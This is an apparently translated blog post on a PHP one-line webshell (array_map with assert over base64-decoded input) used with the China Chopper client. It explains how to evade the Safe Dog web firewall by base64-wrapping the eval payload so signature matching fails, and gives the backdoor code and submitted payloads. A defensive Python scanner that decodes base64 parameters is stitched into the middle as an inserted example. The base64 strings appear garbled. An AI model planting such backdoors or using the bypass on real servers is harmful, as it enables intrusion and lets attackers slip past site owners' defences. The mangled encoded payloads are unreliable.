PHP one-line backdoor, a thousand ways past Safe Dog: handling at the transmission layer

Source: Internet
Author: User
Tags: base64, phpinfo

Once the Trojan is in place, using it requires a data-transmission step: data must be submitted, and there will generally be data returned as well, unless special commands are executed.

When we connect to the backdoor with the ordinary Chopper, how is the data submitted, and how does the Dog recognise it? The following uses an example to demonstrate, in an easy-to-understand way, the principle of getting past the Dog directly at the data-submission layer.

The point of this article: although there are many modified Chopper builds for getting past the Dog, I have looked at them and found their limitations fairly large and their approach not very systematic, so a newcomer studying them may pick up only a single move.

Environment:

Both the domain name and the server are my own, real ones.

The server runs Website Safe Dog + Server Safe Dog with every engine enabled at the highest protection level.

Comparison environment:

Server: Apache + PHP 5.3; local: nginx + PHP 5.3 with no Dog, as the comparison.

The local machine and the Dog-protected server use the same backdoor code and the same connection method.

Note: this article only analyses the principle of getting past the Dog and its implementation in code, as a technical discussion; building or modifying Chopper or other software is not covered here.

Backdoor file:

$a = array(base64_decode($_REQUEST['a']));
@array_map("assert", $a);

Chopper connection: http://localhost/test.php?xx=YXNzZXJ0KCRfUkVRVUVTVFsnc29maWEnXSk= with password sofia

Getting past the Dog at the file-signature level was covered in the previous article.

Chopper has been around for many years, and Safe Dog long ago learned its characteristics well, so let us first look at what characteristics a Chopper connection has.

This is a backdoor I connected to at random; in fact, whatever the backdoor code, when you open file management the data Chopper submits is the same.

The code is:

@eval(base64_decode($_POST[z0]));&z0= Qgluav9zzxqoimrpc3bsyxlfzxjyb3jziiwimcipo0bzzxrfdgltzv9saw1pdcgwkttac2v0x21hz2ljx3f1b3rlc19ydw50aw1lkdapo2vjag8oii0 %2bfcipozskrd1kaxjuyw1lkcrfu0vsvkvswyjtq1jjufrfrklmru5btuuixsk7zwnobyakrc4ixhqio2lmkhn1ynn0cigkrcwwldepit0ilyipe2zvcmvhy2 Gocmfuz2uoikeilcjaiikgyxmgjewpawyoaxnfzglykcrmlii6iikpzwnobygktc4ioiipo307zwnobygifdwtiik7zgllkck7

The command-execution code, i.e. the base64_decode result, is the following; it gets the current directory and the drive letters:

@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=dirname($_SERVER["SCRIPT_FILENAME"]);echo $D."\t";if(substr($D,0,1)!="/"){foreach(range("A","Z") as $L)if(is_dir($L.":"))echo($L.":");};echo("|<-");die();

The parameter name "sofia" is our so-called Chopper password; that needs no explanation, does it?

Now let's submit the Chopper's POST data manually on the local machine:

Locally it returns the current directory and drive letters normally, while the server shows nothing; it must have been intercepted, and that turns out to be the case:

Then why did the interception pop-up not appear?

In my experience, what the file-signature layer detects as a backdoor gets a pop-up window, while the data layer generally does not; of course this is only my personal observation and may not be rigorous.

In fact, the Dog's file-signature backdoor detection and its data-submission detection are completely independent mechanisms.

To verify this, I created a null.php with normal code in the same directory:

It outputs normally when no POST data is sent, showing that the file itself is not the problem.

Let's try sending it the POST data.

No echo came back, so let's look at the Dog's log:

Signature analysis of Chopper

So clearly, the Chopper's POST data is itself a major signature.

You can surely see that this eval is far too conspicuous (of course, other versions or other WAFs may instead match on $_POST or base64_decode):

@eval(base64_decode($_POST[z0]));

Although its data submission clearly pays no attention to concealment, one has to admit that Chopper is a great invention.

Because different PHP backdoors accept data of different types and formats, Chopper constructs a further layer of execution code inside the POST data, so that whatever the PHP backdoor receives is unified into "eval('command to execute')"; this is what makes Chopper so versatile.

For the specific code execution and its return, refer to the previous section.

Modifying the POST data

Now that the cause is clear, we modify the POST data next, and the focus is replacing the eval signature.

Idea one: split up the four letters of "eval"

But there is too little room in the POST data, and for now I have not thought of a good way.

Idea two: modify the backdoor file so that it executes the statement directly

There may be some other callback function, or some other sneaky trick, that can execute a pure execution statement directly from the base64-encoded POST data.

Idea three: construct the eval statement by hand

As mentioned earlier, the POST data ultimately becomes eval('command to execute'), and our backdoor's statement base64-decodes the a parameter:

$a = array(base64_decode($_REQUEST['a']));

So we simply base64-encode the entire eval statement.

So the original Chopper call can be constructed like this:

eval('@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=dirname($_SERVER["SCRIPT_FILENAME"]);echo $D."\t";if(substr($D,0,1)!="/"){foreach(range("A","Z") as $L)if(is_dir($L.":"))echo($L.":");};echo("|<-");die();')

Then base64-encode this statement to get:

Zxzhbcgnqgluav9zzxqoimrpc3bsyxlfzxjyb3jziiwimcipo0bzzxrfdgltzv9saw1pdcgwkttac2v0x21hz2ljx3f1b3rlc19ydw50aw1lkdapo2vjag8oi i0+ Fcipozskrd1kaxjuyw1lkcrfu0vsvkvswyjtq1jjufrfrklmru5btuuixsk7zwnobyakrc4ixhqio2lmkhn1ynn0cigkrcwwldepit0ilyipe2zvcmvhy2goc mfuz2uoikeilcjaiikgyxmgjewpawyoaxnfzglykcrmlii6iikpzwnobygktc4ioiipo307zwnobygifdwtiik7zgllkck7jyk=

OK, now we just pass this string as the a parameter, so the POST data is:

A= Zxzhbcgnqgluav9zzxqoimrpc3bsyxlfzxjyb3jziiwimcipo0bzzxrfdgltzv9saw1pdcgwkttac2v0x21hz2ljx3f1b3rlc19ydw50aw1lkdapo2vjag8oi i0+ Fcipozskrd1kaxjuyw1lkcrfu0vsvkvswyjtq1jjufrfrklmru5btuuixsk7zwnobyakrc4ixhqio2lmkhn1ynn0cigkrcwwldepit0ilyipe2zvcmvhy2goc mfuz2uoikeilcjaiikgyxmgjewpawyoaxnfzglykcrmlii6iikpzwnobygktc4ioiipo307zwnobygifdwtiik7zgllkck7jyk=

Let's try it.

The result comes back successfully; let's try a different statement.

That is the data-flow-level way past the Dog. Of course, there are thousands of such ideas, not just this one, and more remain to be explored.
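The bypass above works because the Dog matched the literal eval(...) in the raw POST body but never decoded the base64 parameter before checking it. As an added example, not code from the article or from Safe Dog, here is a small Python check that peels base64 layers off each parameter before looking for execution tokens; the parameter names, token list and sample bodies are constructed assumptions.

```python
import base64
import re
from urllib.parse import quote, unquote_plus

# Tokens that mean PHP code is arriving as request data. Assumption: tuned to
# the chopper traffic shown in the article; a production rule set is broader.
EXEC_TOKENS = re.compile(
    r"\beval\b|\bassert\b|base64_decode|\$_(?:POST|GET|REQUEST)\b|->\|", re.I)
B64_CHARS = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
MAX_LAYERS = 3  # nested base64 layers to peel before giving up

def peel_base64(value):
    """Return the decoded text if value is one clean base64 layer of text, else None."""
    if len(value) < 8 or len(value) % 4 or not B64_CHARS.match(value):
        return None
    try:
        text = base64.b64decode(value, validate=True).decode("utf-8")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None
    # Accept only text-like output so random binary is not scanned as code.
    return text if all(c.isprintable() or c in "\t\r\n" for c in text) else None

def scan_body(body):
    """Scan a form-encoded POST body and return (parameter, layer, token) findings.

    Layer 0 means the token sat in the raw value, which is all a signature-only
    check sees; layer N means it surfaced only after N base64 decodes.
    """
    findings = []
    for pair in body.split("&"):
        name, _, raw = pair.partition("=")
        text, layer = unquote_plus(raw), 0
        while text is not None and layer <= MAX_LAYERS:
            hit = EXEC_TOKENS.search(text)
            if hit:
                findings.append((name, layer, hit.group(0).lower()))
                break
            text, layer = peel_base64(text.strip()), layer + 1
    return findings

def enc(code):
    """Base64 then URL-encode a value the way a client would submit it."""
    return quote(base64.b64encode(code.encode()).decode(), safe="")

# Constructed samples, not captured traffic: the chopper body with eval in clear
# text, the article's wrapped form with eval only inside the base64 value, a
# doubly wrapped variant, and a benign body that must not trigger.
SAMPLE_CHOPPER = "sofia=@eval(base64_decode($_POST[z0]));&z0=" + enc("phpinfo();")
SAMPLE_WRAPPED = "a=" + enc("eval('phpinfo();')")
SAMPLE_DOUBLE = "a=" + enc(base64.b64encode(b"assert('phpinfo()')").decode())
SAMPLE_BENIGN = "note=" + enc("hello world") + "&q=evaluate+report"
```

Running scan_body over the four samples shows the wrapped form is only caught at layer 1, which is exactly the decode step the Dog's data-layer check skipped.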

One more thing

A small reminder: assert and eval are completely different functions. Do not assume that getting a phpinfo() result means you are past the Dog; assert can run functions like phpinfo(), but other PHP statements still need eval, and of course command execution is not limited to eval either, since there are all sorts of callback functions.

Closing words

So, do you still want to ask how to connect with Chopper?

As said at the start of this article, this is a discussion of the technique itself; as for how to use it, anyone who knows PHP should already have ideas after reading this,

while those who do not know PHP may be thinking, "blogger, hurry up and give me a one-liner plus a tool, preferably one that works out of the box", and secretly hoping it will let them own the world.

I will say it once more: on the road of security, most of us are only students; pay more attention to the technique itself, and just don't get a swelled head.

